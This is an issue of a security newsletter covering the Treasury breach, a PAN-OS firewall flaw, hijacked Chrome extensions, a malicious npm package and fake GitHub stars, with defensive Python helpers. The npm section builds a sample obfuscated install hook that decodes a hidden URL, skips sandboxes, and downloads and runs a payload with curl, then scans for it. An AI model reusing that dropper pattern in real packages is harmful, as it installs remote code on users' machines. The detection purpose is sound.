🎓️ Vulnerable U | #097

U.S. Army is having a week full of arrests, China hacked the U.S. Treasury, 35 more Chrome extensions were hit by the same attackers who got CyberHaven, and much more!

Read Time: 8 minutes

Howdy friends!

Happy 2025! What a start to the year already; we didn't even get a minute of slow news. I'm not sure about you all, but I'm watching all these attacks closely as they seem linked. Makes me worry we haven't seen the last of it.

Hope you all were able to avoid the sicknesses that my house was collecting like Pokemon cards.

ICYMI

🖊️ Something I wrote: When Rest Feels Like a Risk

🎧️ Something I heard: Every time I throw a song in this slot, people tell me they dig that I did that. I haven't been listening to many podcasts lately anyway, so here is a song that I recently added to my constant-rotation playlist.

🎤 Something I said: A look back on my top video of 2024. Crazy one wasn’t it? A bunch of you reached out and said that’s how you found me. Well thanks for sticking around.

🔖 Something I read: I'll be honest, I've sunk a disgusting amount of hours into Wind and Truth and I'm just over halfway through. But I also dug way into some of the stories this week as they're nuts. Especially this one - U.S. Army Soldier Arrested in AT&T, Verizon Extortions

Vulnerable News

The Treasury Department got hit by Chinese APT actors in December. The attackers got hold of an API key for BeyondTrust's remote support service (Treasury's provider) and used it to access Treasury workstations and some unclassified documents. BeyondTrust first spotted something fishy on December 2nd, confirmed the API key compromise on the 5th, and notified Treasury on the 8th.

This is part of a broader pattern of Chinese espionage campaigns hitting U.S. government targets - remember that Salt Typhoon telecom breach that exposed communications of government officials? (read more)

In a follow-up to the top story, it came to light that the Chinese hackers hit the Treasury's sanctions office - you know, the folks who decide which Chinese companies and individuals get the financial timeout. The Treasury's calling it a "major cybersecurity incident" but says the attackers are now locked out. (read more)

It's a U.S. Treasury kind of news day. They just dropped new sanctions on Iran's and Russia's election-meddling crews. They're targeting the IRGC's Cognitive Design Production Center and a GRU-linked outfit called the Center for Geopolitical Expertise. The Russian group, founded by previously-sanctioned Aleksandr Dugin, has been busy with deepfakes and running about 100 fake news sites, complete with their own AI server setup.

We're seeing full AI infrastructure and massive networks of convincing fake news sites. The GRU's even paying rent for an apartment to house their server farm. While these OFAC designations basically lock these groups out of the U.S. financial system, let's be real - they're probably not too worried about accessing their Chase accounts right now. (read more)

There's active exploitation happening against Palo Alto Networks firewalls right now. The bug (CVE-2024-3393) lets an unauthenticated attacker send a malicious packet through the firewall that crashes and reboots it; do that repeatedly and the firewall drops into maintenance mode. It's a denial of service, not code execution, and DNS Security logging has to be enabled for the firewall to be vulnerable, but that's a pretty common config.

PAN's already patched this in the latest versions (10.1.14-h8, 10.2.10-h12, 11.1.5, 11.2.3 and later), and Prisma Access fixes are coming in early January. If you can't patch right away, the suggested workaround is disabling DNS Security logging, which also means you lose that visibility until you do patch. While they're not sharing actual victim numbers, the fact that they rushed out an advisory during the holidays signals seriousness to me. (read more)
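If you want a quick way to triage a fleet against the fixed versions above, here is a small Python helper I put together for this issue. It's not PAN's code and not from the advisory. It parses PAN-OS version strings including the -hN hotfix suffix, compares each firewall against the floor for its release train using only the four versions quoted here, and treats "DNS Security logging off" as not exposed. The inventory is made up. The vendor advisory also lists hotfixes for earlier maintenance releases that this example does not know about, so a "vulnerable" result means "go check the advisory for your exact release", not "definitely exploitable".

```python
import re

# Minimum fixed version per PAN-OS release train, taken from the versions
# listed above (10.1.14-h8, 10.2.10-h12, 11.1.5, 11.2.3). Encoded as
# (major, minor, maintenance, hotfix); a missing hotfix counts as 0.
FIXED_FLOOR = {
    "10.1": (10, 1, 14, 8),
    "10.2": (10, 2, 10, 12),
    "11.1": (11, 1, 5, 0),
    "11.2": (11, 2, 3, 0),
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(text: str) -> tuple[int, int, int, int]:
    """Turn '10.1.14-h8' into (10, 1, 14, 8) and '11.1.5' into (11, 1, 5, 0)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def assess_cve_2024_3393(version: str, dns_security_logging: bool = True) -> str:
    """Classify a firewall against the fix floors listed in this newsletter.

    Returns one of:
      'not_exposed'    DNS Security logging is off, so the vulnerable path is not reachable
      'fixed'          at or above the fixed version for its release train
      'vulnerable'     below the floor for a listed train; check the advisory for a
                       hotfix on your exact maintenance release before assuming
      'unknown_train'  release train not covered by the versions listed here
    """
    if not dns_security_logging:
        return "not_exposed"
    parsed = parse_panos_version(version)
    train = f"{parsed[0]}.{parsed[1]}"
    floor = FIXED_FLOOR.get(train)
    if floor is None:
        return "unknown_train"
    # Tuple comparison gives the right ordering across maintenance and hotfix:
    # 10.1.15 (10,1,15,0) > 10.1.14-h8 (10,1,14,8) > 10.1.14-h7 (10,1,14,7).
    return "fixed" if parsed >= floor else "vulnerable"


if __name__ == "__main__":
    # Constructed inventory for the demo; nothing here is a real device.
    fleet = {
        "fw-edge-01": ("10.1.14-h8", True),
        "fw-edge-02": ("10.1.14-h7", True),
        "fw-dc-01": ("10.2.10-h12", True),
        "fw-dc-02": ("10.2.9", False),
        "fw-branch-01": ("11.1.4", True),
        "fw-lab-01": ("11.0.4", True),
    }
    for name, (ver, logging_on) in sorted(fleet.items()):
        print(f"{name:14} {ver:13} {assess_cve_2024_3393(ver, logging_on)}")
```

Feed it the output of your own inventory (the version string and whether the DNS Security logging profile is attached) and sort by the result; anything in the "vulnerable" or "unknown_train" buckets goes to the advisory for a closer look.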

We covered this story last week about how CyberHaven had their Chrome extension hijacked. Well turns out they weren’t alone.

The attackers went after Chrome extension developers with a broad OAuth phishing campaign. They sent fake Chrome Web Store policy-violation notices that led to a genuine Google OAuth consent page for an attacker-controlled app, asking for permission to manage the developer's Chrome Web Store items. Once a developer clicked through, the attackers had a token that let them push modified versions of at least 35 extensions (around 2.6M users) that steal Facebook business account data. MFA didn't help: the developers logged in legitimately, second factor included, and then authorized a malicious app. The OAuth token that app received is independent of the password and MFA, so there was nothing left for MFA to block.

What's particularly interesting is the scale and preparation here - they pre-registered domains for extensions they were planning to target as far back as March 2024. The malicious code they injected was specifically after Facebook business accounts, looking to grab everything from access tokens to QR codes used in 2FA. Classic case of targeting the supply chain to hit the real prize - Facebook ad accounts with payment methods attached. (read more)

Well this is a fun reminder that your Tesla data isn't really yours. After the Cybertruck explosion in Vegas, Elon showed off Tesla's capabilities by remotely unlocking the vehicle for law enforcement and handing over video from charging stations to track its movements. The sheriff even gave Elon a personal shoutout for the assist.

While helping catch a potential car bomber seems reasonable, it highlights how much control and surveillance capability Tesla (and Elon personally) has over these vehicles. Between remote unlocking, location tracking, worker-accessible cameras, and features locked behind subscriptions, you're basically just renting an expensive surveillance device. As 404 Media points out, these "emergency" capabilities have a funny way of becoming everyday tools - just look at how phone hacking went from terrorism cases to regular police work.

Always be wary if someone is telling you it's okay to infringe on your privacy to "save the children" or for some other emotional reason. (read more)

Apple's getting ready to shell out $95M (so like two hours of revenue?) to settle claims that Siri was being a bit too nosy, recording folks without the magic "Hey Siri" wake words. According to the lawsuit, even something as innocent as the sound of a zipper could trigger Siri to start recording and shipping that audio back to Apple's servers. Some users even claim they got targeted ads based on private conversations - like one person who started seeing ads for meds they'd only discussed with their doctor.

I think we’ve all had this experience.

The settlement could cover anyone who's owned a Siri device since 2011, though with that many potential claimants, don't expect a big payout. For Apple, which pulled in $93.7B in net income last year, this is couch cushion money. Meanwhile, Google's facing similar heat over their Assistant's alleged eavesdropping habits. (read more)

Feds nabbed another player in the Snowflake hacking saga: a 20-year-old Army communications specialist named Cameron Wagenius. Going by Kiberphant0m online, he allegedly got his hands on some spicy phone records from AT&T and Verizon, including presidential call logs, which he leaked to try to extort AT&T. Brian Krebs connected the dots on this one, linking Wagenius to Connor Moucka (aka Judische), who was arrested back in October.

The kid was apparently busy - claimed to have hacked 15+ telecom providers and ran a DDoS botnet. He's the third arrest in the Snowflake campaign, joining Moucka and John Binns (the T-Mobile hacker currently cooling his heels in Turkey). Mom confirmed her son’s extracurricular activities, which probably didn't help his case. (read more)

Heads up npm users: there's a package called "ethereumvulncontracthandler" pretending to be an Ethereum security tool that's actually dropping the Quasar RAT. The package has been downloaded 66 times since December 18th and is still up on npm. Socket's (friends of VulnU, awesome team) researchers found it uses all the classic obfuscation tricks (Base64, XOR encoding, and minification) to hide its true nature. Once it gets on your system, it checks whether it's running in a sandbox, then pulls down Quasar RAT from a sketchy domain.
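To make the Base64 plus XOR trick concrete, here's an added Python example. It's mine, written for this issue; it is not Socket's tooling and not the actual package's code. It builds a constructed install hook in the style described (XOR-then-Base64 encoded URL, a hardware check that skips small sandbox VMs, a child_process call to fetch and run the payload), with a placeholder URL on the reserved .invalid TLD, then runs a small scanner over it and over a benign script. The scanner combines regex indicators with a brute force of the single-byte XOR key on any long Base64 literal, so it recovers what the blob hides. The indicator names and thresholds are my choices.

```python
import base64
import binascii
import re
import string

# --- Constructed sample, not the real package's code ----------------------
# The "payload" URL is a placeholder on the reserved .invalid TLD.
PAYLOAD_URL = "http://payload.example.invalid/loader.exe"
XOR_KEY = 0x5A


def _xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def _obfuscate(plaintext: str, key: int) -> str:
    """Layer the two encodings the researchers describe: XOR, then Base64."""
    return base64.b64encode(_xor(plaintext.encode(), key)).decode()


# A minified install hook in the style described: decode the blob, skip if the
# host looks like a small sandbox VM, otherwise fetch and run the payload.
MALICIOUS_INSTALL_JS = (
    f"const k={XOR_KEY};const b='{_obfuscate(PAYLOAD_URL, XOR_KEY)}';"
    "const u=Buffer.from(b,'base64').toString('binary').split('')"
    ".map(c=>String.fromCharCode(c.charCodeAt(0)^k)).join('');"
    "if(require('os').totalmem()>4e9){require('child_process')"
    ".exec(`curl -s ${u} -o /tmp/a && chmod +x /tmp/a && /tmp/a`)}"
)

BENIGN_INSTALL_JS = """'use strict';
const fs = require('fs');
// Plain, readable code with nothing to hide.
module.exports = function loadAbi(path) {
  return JSON.parse(fs.readFileSync(path, 'utf8'));
};
"""

# --- Scanner ---------------------------------------------------------------
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
INDICATORS = {
    "xor_decode_loop": re.compile(r"charCodeAt\([^)]*\)\s*\^"),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "process_spawn": re.compile(r"child_process"),
    "environment_probe": re.compile(r"\b(?:totalmem|cpus|hostname)\("),
}
LONG_LINE = 200  # rough minification heuristic; tune for your code base
PRINTABLE = set(string.printable)


def recover_strings(blob: str) -> list[tuple[int, str]]:
    """Base64-decode a literal and brute-force a single-byte XOR key.

    Returns every (key, text) where the result is printable ASCII and
    contains 'http'; key 0 covers the plain-Base64 case.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return []
    hits = []
    for key in range(256):
        try:
            text = _xor(raw, key).decode("ascii")
        except UnicodeDecodeError:
            continue
        if set(text) <= PRINTABLE and "http" in text:
            hits.append((key, text))
    return hits


def scan_install_script(js: str) -> dict:
    """Return indicator names, any recovered strings, and a simple count score."""
    indicators = [name for name, rx in INDICATORS.items() if rx.search(js)]
    if any(len(line) > LONG_LINE for line in js.splitlines()):
        indicators.append("minified_long_line")
    recovered = []
    for blob in BASE64_RE.findall(js):
        recovered.extend(recover_strings(blob))
    if recovered:
        indicators.append("hidden_url_in_base64")
    return {"indicators": indicators, "recovered": recovered, "score": len(indicators)}


if __name__ == "__main__":
    for label, js in (("malicious", MALICIOUS_INSTALL_JS), ("benign", BENIGN_INSTALL_JS)):
        result = scan_install_script(js)
        print(label, result["score"], result["indicators"])
        for key, text in result["recovered"]:
            print(f"  recovered with XOR key 0x{key:02x}: {text}")
```

Point scan_install_script at the preinstall/postinstall scripts of anything you're about to add as a dependency. A single indicator is weak evidence (plenty of legitimate packages ship minified code), but a long Base64 literal that XOR-decodes to a URL next to a child_process call is exactly the shape described above and deserves a manual look before install.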

The researchers also dropped an interesting side note about the growing problem of fake GitHub stars being used to promote malware repos. Apparently there's a whole black market where you can buy 1,000 stars for $110. They estimate there are about 4.5 million fake stars across 23,000 repos, mostly promoting sketchy stuff like game cheats and crypto bots. Just another reminder that GitHub stars aren't a great measure of legitimacy these days. (read more)

GitHub's got a star problem - researchers just found over 3.1 million fake "stars" being used to boost repository rankings. A team from Socket (didn’t even realize they got two shouts this week), Carnegie Mellon, and NC State built a tool called StarScout that dug through 20TB of GitHub data and found suspicious patterns like bot accounts and coordinated starring activity. The fake stars are being used to promote everything from straight-up malware to just developers trying to make their legit projects look more popular.

What's wild is that this isn't just a few isolated cases: about 15.8% of repos with over 50 stars in July 2024 were caught up in a fake-star campaign. GitHub's been playing whack-a-mole, removing suspicious accounts and repos as they're reported, but it's clearly an ongoing battle. This just feels like old Internet to me, I kind of love it. (read more)
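Here's a rough sketch, in Python, of what "bot accounts plus coordinated starring" looks like as detection logic, covering both the Socket side note and the StarScout story above. It's my illustration written for this issue, not StarScout or anything the researchers published, and the thresholds (account under 30 days old, no followers, at most one repo, five or more such stars inside an hour) are my approximations of those two ideas, not the paper's parameters. The star events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Heuristic thresholds; my own approximations of "low-activity account" and
# "coordinated burst", not StarScout's published parameters.
MAX_ACCOUNT_AGE_DAYS = 30      # account created shortly before it starred
MAX_FOLLOWERS = 0
MAX_PUBLIC_REPOS = 1
BURST_WINDOW = timedelta(hours=1)
MIN_BURST_SIZE = 5


def is_low_activity(event: dict) -> bool:
    """A throwaway-looking account: brand new, nobody follows it, nothing published."""
    age = event["starred_at"] - event["account_created_at"]
    return (
        age <= timedelta(days=MAX_ACCOUNT_AGE_DAYS)
        and event["followers"] <= MAX_FOLLOWERS
        and event["public_repos"] <= MAX_PUBLIC_REPOS
    )


def find_suspicious_repos(events: list[dict]) -> dict[str, dict]:
    """Group low-activity stars per repo and flag repos with a dense burst of them."""
    per_repo = defaultdict(list)
    for ev in events:
        if is_low_activity(ev):
            per_repo[ev["repo"]].append(ev["starred_at"])
    flagged = {}
    for repo, times in per_repo.items():
        times.sort()
        # Sliding window: most low-activity stars that fit inside one BURST_WINDOW.
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > BURST_WINDOW:
                start += 1
            best = max(best, end - start + 1)
        if best >= MIN_BURST_SIZE:
            flagged[repo] = {"low_activity_stars": len(times), "largest_burst": best}
    return flagged


def _event(repo, user, starred_at, account_age_days, followers, public_repos):
    return {
        "repo": repo, "user": user, "starred_at": starred_at,
        "account_created_at": starred_at - timedelta(days=account_age_days),
        "followers": followers, "public_repos": public_repos,
    }


def sample_events() -> list[dict]:
    """Constructed star events: one boosted repo, one organically starred repo."""
    t0 = datetime(2024, 7, 1, 12, 0)
    # Eight two-day-old empty accounts starring within half an hour of each other.
    boosted = [
        _event("acme/free-cheat-loader", f"user{i:03d}", t0 + timedelta(minutes=4 * i), 2, 0, 0)
        for i in range(8)
    ]
    # Established accounts starring one a day, plus two genuine newcomers hours apart.
    organic = [
        _event("legit/useful-lib", f"dev{i}", t0 + timedelta(days=i), 400 + 30 * i, 12 + i, 6)
        for i in range(8)
    ]
    organic += [_event("legit/useful-lib", "newbie1", t0, 3, 0, 0),
                _event("legit/useful-lib", "newbie2", t0 + timedelta(hours=3), 5, 0, 1)]
    return boosted + organic


if __name__ == "__main__":
    for repo, stats in find_suspicious_repos(sample_events()).items():
        print(repo, stats)
```

Two caveats from the stories themselves: the researchers worked from GitHub's full activity record, while this only looks at star events plus a bit of account metadata, and fake stars also get bought for otherwise legitimate projects, so a flag here says "the popularity is inflated", not "the code is malicious".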

Cisco's having a rough Christmas with IntelBroker dropping another 4GB of their data on December 25th. Cisco's confirming it's legit but insisting there wasn't actually a breach - apparently all this stuff came from a public-facing DevHub that was serving as a resource center. Though they're quick to point out some of those files weren't supposed to be public.

The hacker claimed 800GB, then upped it to 4.5TB of stolen data. While Cisco's maintaining their "no breach" stance, they've quietly removed their earlier statement about no sensitive personal info being compromised - which is, you know, not a great sign. The leaked info includes source code, scripts, and digital certificates, but we'll see if there's more we hear about later. (read more)

Miscellaneous mattjay

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.


Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay